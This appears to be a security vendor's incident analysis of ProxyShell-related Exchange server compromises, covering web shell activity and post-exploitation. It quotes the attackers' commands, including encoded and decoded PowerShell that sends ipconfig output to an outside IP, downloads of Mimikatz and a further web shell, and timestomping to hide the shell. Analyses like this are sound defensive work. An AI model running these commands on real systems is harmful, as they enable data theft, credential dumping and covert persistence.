Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.

“C:\Windows\System32\cmd.exe” /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

  • cmd.exe /c ipconfig
  • cmd.exe /c dir
  • “c:\windows\system32\cmd.exe” /c ping -n 1 google.com
  • “c:\windows\system32\cmd.exe” /c whoami

The web shell was then copied and the original entry deleted using the following commands:

  • cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
  • “c:\windows\system32\cmd.exe” /c del “C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req”

The ipconfig command was executed as an argument for a wget request.

The following code shows the Powershell-encoded (top) and decoded (bottom) commands:

“c:\windows\system32\cmd.exe” /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType “application/octet-stream”

Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:

“c:\windows\system32\cmd.exe” /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=

Invoke-WebRequest -Uri “http://91.92.136.250:443/mimi.exe” -OutFile “c:\windows\temp\mimi.exe”

The web shell then downloaded an additional .aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:

Invoke-WebRequest -Uri “http://91.92.136.250:443/out.aspx” -OutFile “c:\windows\temp\OutlookCM.aspx”

The web shell was then moved to the OWA directory with the following time stamp:

$f1=(Get-Item ‘C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx’); $f2=(Get-Item ‘C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx’); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;

After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.

  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_ffhsdhdi.dll
  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_m123qbjp.dll

In relation to this incident, we found the following malicious components and malware were used:

  • OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
  • App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
  • App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)

Other web shells

During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead.  This is similar to the bespoke web shell the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.

Read More HERE